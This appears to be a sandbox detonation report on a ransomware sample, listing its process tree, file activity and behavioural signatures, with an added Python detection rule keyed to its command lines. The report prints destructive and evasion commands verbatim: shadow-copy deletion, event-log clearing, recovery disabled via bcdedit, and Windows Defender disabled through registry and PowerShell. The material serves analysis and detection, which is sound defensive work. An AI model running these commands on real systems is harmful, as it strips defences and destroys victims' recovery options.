PID 520 wrote to memory of 540 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1792 wrote to memory of 760 | N/A | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | C:\Windows\system32\net.exe
PID 1792 wrote to memory of 760 | N/A | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | C:\Windows\system32\net.exe
PID 1792 wrote to memory of 760 | N/A | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | C:\Windows\system32\net.exe
PID 760 wrote to memory of 1624 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 760 wrote to memory of 1624 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 760 wrote to memory of 1624 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1792 wrote to memory of 1740 | N/A | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | C:\Windows\system32\net.exe
PID 1792 wrote to memory of 1740 | N/A | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | C:\Windows\system32\net.exe
PID 1792 wrote to memory of 1740 | N/A | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | C:\Windows\system32\net.exe
PID 1740 wrote to memory of 832 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1740 wrote to memory of 832 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1740 wrote to memory of 832 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1792 wrote to memory of 1812 | N/A | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | C:\Windows\system32\net.exe
PID 1792 wrote to memory of 1812 | N/A | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | C:\Windows\system32\net.exe
PID 1792 wrote to memory of 1812 | N/A | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | C:\Windows\system32\net.exe
PID 1812 wrote to memory of 360 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1812 wrote to memory of 360 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1812 wrote to memory of 360 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1792 wrote to memory of 1788 | N/A | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | C:\Windows\system32\net.exe
PID 1792 wrote to memory of 1788 | N/A | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | C:\Windows\system32\net.exe
PID 1792 wrote to memory of 1788 | N/A | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | C:\Windows\system32\net.exe
PID 1788 wrote to memory of 828 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1788 wrote to memory of 828 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1788 wrote to memory of 828 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1792 wrote to memory of 1828 | N/A | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | C:\Windows\system32\net.exe
PID 1792 wrote to memory of 1828 | N/A | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | C:\Windows\system32\net.exe
PID 1792 wrote to memory of 1828 | N/A | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | C:\Windows\system32\net.exe
PID 1828 wrote to memory of 1112 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1828 wrote to memory of 1112 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1828 wrote to memory of 1112 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1792 wrote to memory of 1068 | N/A | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | C:\Windows\system32\net.exe
PID 1792 wrote to memory of 1068 | N/A | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | C:\Windows\system32\net.exe
PID 1792 wrote to memory of 1068 | N/A | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | C:\Windows\system32\net.exe
PID 1068 wrote to memory of 1928 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1068 wrote to memory of 1928 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1068 wrote to memory of 1928 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1792 wrote to memory of 1804 | N/A | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | C:\Windows\system32\net.exe
PID 1792 wrote to memory of 1804 | N/A | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | C:\Windows\system32\net.exe
PID 1792 wrote to memory of 1804 | N/A | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | C:\Windows\system32\net.exe
PID 1804 wrote to memory of 1976 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1804 wrote to memory of 1976 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1804 wrote to memory of 1976 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1792 wrote to memory of 1652 | N/A | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | C:\Windows\system32\sc.exe
PID 1792 wrote to memory of 1652 | N/A | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | C:\Windows\system32\sc.exe
PID 1792 wrote to memory of 1652 | N/A | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | C:\Windows\system32\sc.exe
PID 1792 wrote to memory of 680 | N/A | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | C:\Windows\system32\sc.exe
PID 1792 wrote to memory of 680 | N/A | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | C:\Windows\system32\sc.exe
PID 1792 wrote to memory of 680 | N/A | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | C:\Windows\system32\sc.exe
PID 1792 wrote to memory of 1312 | N/A | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | C:\Windows\system32\sc.exe
PID 1792 wrote to memory of 1312 | N/A | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | C:\Windows\system32\sc.exe
PID 1792 wrote to memory of 1312 | N/A | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | C:\Windows\system32\sc.exe
PID 1792 wrote to memory of 1296 | N/A | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | C:\Windows\system32\sc.exe
PID 1792 wrote to memory of 1296 | N/A | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | C:\Windows\system32\sc.exe
PID 1792 wrote to memory of 1296 | N/A | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | C:\Windows\system32\sc.exe
PID 1792 wrote to memory of 1756 | N/A | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | C:\Windows\system32\sc.exe
PID 1792 wrote to memory of 1756 | N/A | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | C:\Windows\system32\sc.exe
PID 1792 wrote to memory of 1756 | N/A | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | C:\Windows\system32\sc.exe
PID 1792 wrote to memory of 1440 | N/A | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | C:\Windows\system32\sc.exe

Processes

C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe

"C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe"

C:\Windows\system32\net.exe

net.exe stop "NetMsmqActivator" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "NetMsmqActivator" /y

C:\Windows\system32\net.exe

net.exe stop "SamSs" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\system32\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\system32\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\system32\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\system32\net.exe

net.exe stop "VSS" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\system32\net.exe

net.exe stop "wbengine" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\system32\net.exe

net.exe stop "WebClient" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\system32\sc.exe

sc.exe config "NetMsmqActivator" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl system

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl security

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl application

C:\Windows\System32\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\System32\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} recoveryenabled no

C:\Windows\system32\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\system32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\system32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true
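Detection logic for the command lines listed above, added here as an example; it is not part of the sandbox output. It runs over constructed process-creation records (fields ProcessId, ParentProcessId and CommandLine, modelled on a Sysmon Event ID 1 record) whose command lines are copied verbatim from the Processes list, plus three benign administrative commands under a different parent. Hits are grouped by parent PID so that what fires is one process driving several distinct techniques, not a lone `net stop`. The ATT&CK IDs are the standard ones for these behaviours (T1489 Service Stop, T1490 Inhibit System Recovery, T1070.001 Clear Windows Event Logs, T1562.001 Disable or Modify Tools); the rule names, the threshold and the child PIDs are this example's own.

```python
import re
from collections import defaultdict

# (rule name, ATT&CK technique, regex over the full command line).
# Patterns are written against the exact spellings in the process list above.
RULES = [
    ("vssadmin shadow deletion", "T1490",
     re.compile(r'\bvssadmin(?:\.exe)?\s+delete\s+shadows\b', re.I)),
    ("wmic shadow deletion", "T1490",
     re.compile(r'\bwmic(?:\.exe)?\s+shadowcopy\s+delete\b', re.I)),
    ("bcdedit recovery disabled", "T1490",
     re.compile(r'\bbcdedit(?:\.exe)?\s+/set\b.*\b(?:recoveryenabled\s+no|'
                r'bootstatuspolicy\s+ignoreallfailures)\b', re.I)),
    ("wevtutil log clear", "T1070.001",
     re.compile(r'\bwevtutil(?:\.exe)?\s+cl\s+\S+', re.I)),
    ("Defender policy key tampering", "T1562.001",
     re.compile(r'\breg(?:\.exe)?\s+(?:add|delete)\s+"?HKLM\\Software\\Policies\\'
                r'Microsoft\\Windows Defender', re.I)),
    ("Defender service/driver set to disabled", "T1562.001",
     re.compile(r'\breg(?:\.exe)?\s+add\s+"?HKLM\\System\\CurrentControlSet\\Services\\'
                r'(?:WinDefend|WdBoot|WdFilter|WdNisDrv|WdNisSvc|SecurityHealthService)"?'
                r'\s+/v\s+"?Start"?\s.*\s/d\s+"?4"?', re.I)),
    ("Set-MpPreference -Disable*", "T1562.001",
     re.compile(r'Set-MpPreference\s+-Disable\w+\s+\$true', re.I)),
    ("MpCmdRun definitions removed", "T1562.001",
     re.compile(r'MpCmdRun(?:\.exe)?"?\s+-RemoveDefinitions\b', re.I)),
    ("Defender scheduled task disabled", "T1562.001",
     re.compile(r'\bschtasks(?:\.exe)?\s+/Change\s+/TN\s+"?Microsoft\\Windows\\'
                r'(?:Windows Defender|ExploitGuard)\\.*\s/Disable\b', re.I)),
    ("net stop", "T1489",
     re.compile(r'\bnet1?(?:\.exe)?\s+stop\s+', re.I)),
    ("sc config start= disabled", "T1489",
     re.compile(r'\bsc(?:\.exe)?\s+config\s+\S+\s+start=\s*disabled\b', re.I)),
]


def _ev(pid, ppid, cmd):
    return {"ProcessId": pid, "ParentProcessId": ppid, "CommandLine": cmd}


# Constructed records.  Command lines are copied from the Processes list;
# parent 1792 is the sample's PID in the WriteProcessMemory rows, the child
# PIDs are illustrative.  The last three are benign commands under another parent.
SAMPLE_EVENTS = [
    _ev(1804, 1792, r'net.exe stop "VSS" /y'),
    _ev(1652, 1792, r'sc.exe config "VSS" start= disabled'),
    _ev(2001, 1792, r'reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f'),
    _ev(2002, 1792, r'reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f'),
    _ev(2003, 1792, r'schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable'),
    _ev(2004, 1792, r'vssadmin.exe delete shadows /all /quiet'),
    _ev(2005, 1792, r'wevtutil.exe cl security'),
    _ev(2006, 1792, r'wmic.exe shadowcopy delete'),
    _ev(2007, 1792, r'bcdedit.exe /set {default} recoveryenabled no'),
    _ev(2008, 1792, r'"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All'),
    _ev(2009, 1792, r'powershell Set-MpPreference -DisableRealtimeMonitoring $true'),
    _ev(3001, 1000, r'net.exe use Z: \\fileserver\share'),
    _ev(3002, 1000, r'sc.exe query WinDefend'),
    _ev(3003, 1000, r'reg.exe query "HKLM\Software\Microsoft\Windows NT\CurrentVersion" /v ProductName'),
]


def match_rules(command_line):
    """All (rule name, technique) pairs whose pattern hits this command line."""
    return [(name, tech) for name, tech, rx in RULES if rx.search(command_line)]


def triage(events, min_techniques=3):
    """Group rule hits by parent PID and keep only parents whose children cover
    at least `min_techniques` distinct techniques.
    Returns {parent_pid: {technique: [command lines]}}."""
    by_parent = defaultdict(lambda: defaultdict(list))
    for ev in events:
        for _name, tech in match_rules(ev["CommandLine"]):
            by_parent[ev["ParentProcessId"]][tech].append(ev["CommandLine"])
    return {pid: dict(hits) for pid, hits in by_parent.items()
            if len(hits) >= min_techniques}


if __name__ == "__main__":
    for pid, hits in triage(SAMPLE_EVENTS).items():
        print(f"parent PID {pid}: {len(hits)} techniques")
        for tech, cmds in sorted(hits.items()):
            for cmd in cmds:
                print(f"  {tech}  {cmd}")
```

On their own, `net stop` and `sc config ... start= disabled` fire on routine administration; the parent-process correlation and the technique threshold are what make this usable as an alert rather than a hunt query. The patterns are tied to the spellings seen here (`start= disabled`, `Set-MpPreference -Disable... $true`, quoted registry paths), so variants such as `powershell -enc`, `sc.exe stop` or PowerShell `Stop-Service` need rules of their own.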

Network

N/A

Files

memory/520-54-0x0000000000000000-mapping.dmp

memory/540-55-0x0000000000000000-mapping.dmp

memory/760-56-0x0000000000000000-mapping.dmp

memory/1624-57-0x0000000000000000-mapping.dmp

memory/1740-58-0x0000000000000000-mapping.dmp

memory/832-59-0x0000000000000000-mapping.dmp

memory/1812-60-0x0000000000000000-mapping.dmp

memory/360-61-0x0000000000000000-mapping.dmp

memory/1788-62-0x0000000000000000-mapping.dmp

memory/828-63-0x0000000000000000-mapping.dmp

memory/1828-64-0x0000000000000000-mapping.dmp

memory/1112-65-0x0000000000000000-mapping.dmp

memory/1068-66-0x0000000000000000-mapping.dmp

memory/1928-67-0x0000000000000000-mapping.dmp

memory/1804-68-0x0000000000000000-mapping.dmp

memory/1976-69-0x0000000000000000-mapping.dmp

memory/1652-70-0x0000000000000000-mapping.dmp

memory/680-71-0x0000000000000000-mapping.dmp

memory/1312-72-0x0000000000000000-mapping.dmp

memory/1296-73-0x0000000000000000-mapping.dmp

memory/1756-74-0x0000000000000000-mapping.dmp

memory/1440-75-0x0000000000000000-mapping.dmp

memory/1304-76-0x0000000000000000-mapping.dmp

memory/1672-77-0x0000000000000000-mapping.dmp

memory/584-78-0x0000000000000000-mapping.dmp

memory/1528-79-0x0000000000000000-mapping.dmp

memory/1524-80-0x0000000000000000-mapping.dmp

memory/272-81-0x0000000000000000-mapping.dmp

memory/1544-82-0x0000000000000000-mapping.dmp

memory/432-83-0x0000000000000000-mapping.dmp

memory/1112-84-0x0000000000000000-mapping.dmp

memory/1612-85-0x0000000000000000-mapping.dmp

memory/1476-86-0x0000000000000000-mapping.dmp

memory/1360-87-0x0000000000000000-mapping.dmp

memory/1632-88-0x0000000000000000-mapping.dmp

memory/316-89-0x0000000000000000-mapping.dmp

memory/384-90-0x0000000000000000-mapping.dmp

memory/920-91-0x0000000000000000-mapping.dmp

memory/1572-92-0x0000000000000000-mapping.dmp

memory/664-93-0x0000000000000000-mapping.dmp

memory/1416-94-0x0000000000000000-mapping.dmp

memory/1864-95-0x0000000000000000-mapping.dmp

memory/800-96-0x0000000000000000-mapping.dmp

memory/1600-97-0x0000000000000000-mapping.dmp

memory/1588-98-0x0000000000000000-mapping.dmp

memory/560-99-0x0000000000000000-mapping.dmp

memory/632-100-0x0000000000000000-mapping.dmp

memory/804-101-0x0000000000000000-mapping.dmp

memory/1776-102-0x0000000000000000-mapping.dmp

memory/772-103-0x0000000000000000-mapping.dmp

memory/916-104-0x0000000000000000-mapping.dmp

memory/1408-105-0x0000000000000000-mapping.dmp

memory/1548-106-0x0000000000000000-mapping.dmp

memory/1868-107-0x0000000000000000-mapping.dmp

memory/688-108-0x0000000000000000-mapping.dmp

memory/960-109-0x0000000000000000-mapping.dmp

memory/764-110-0x0000000000000000-mapping.dmp

memory/832-111-0x0000000000000000-mapping.dmp

memory/1384-112-0x0000000000000000-mapping.dmp

memory/1384-113-0x000007FEFB571000-0x000007FEFB573000-memory.dmp

memory/1716-114-0x0000000000000000-mapping.dmp

memory/564-116-0x0000000000000000-mapping.dmp

memory/1620-118-0x0000000000000000-mapping.dmp

memory/1400-119-0x0000000000000000-mapping.dmp

memory/2064-120-0x0000000000000000-mapping.dmp

memory/2160-122-0x000007FEF2780000-0x000007FEF32DD000-memory.dmp

memory/2160-123-0x0000000002620000-0x0000000002622000-memory.dmp

memory/2160-124-0x0000000002622000-0x0000000002624000-memory.dmp

memory/2160-125-0x0000000002624000-0x0000000002627000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 5464474b4b4e8ae38c10b2cd2ada30fe
SHA1 1f91b4850c26fdcce42aa16c2f571459772f4329
SHA256 f4a25c2e6153d00d41b9a2db8dcb3c496fa42620638e69c2e40631e40628f4f7
SHA512 f897951fedafe5788af2335f87118d735977e011e93be3ee91cefcbb142d3aa02338e1181b7e723ddf48f4388f61d9297f8cb70a302df6946b400056c401e59d

memory/2244-128-0x000007FEF1DE0000-0x000007FEF293D000-memory.dmp

memory/2160-129-0x000000000262B000-0x000000000264A000-memory.dmp

memory/2244-131-0x0000000002872000-0x0000000002874000-memory.dmp

memory/2244-130-0x0000000002870000-0x0000000002872000-memory.dmp

memory/2244-132-0x0000000002874000-0x0000000002877000-memory.dmp

memory/2244-133-0x000000000287B000-0x000000000289A000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-01-13 10:00

Reported

2022-01-13 10:05

Platform

win10-en-20211208

Max time kernel

106s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\SYSTEM32\reg.exe N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\bcdedit.exe N/A
N/A N/A C:\Windows\SYSTEM32\bcdedit.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\Assets\Logos\Wide310x150\PaintWideTile.scale-400.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Audio\slide_in.wav C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ro-ro\ui-strings.js.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_OAAAADgAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdO365R_SubTest-pl.xrm-ms.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_AAAAAAAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
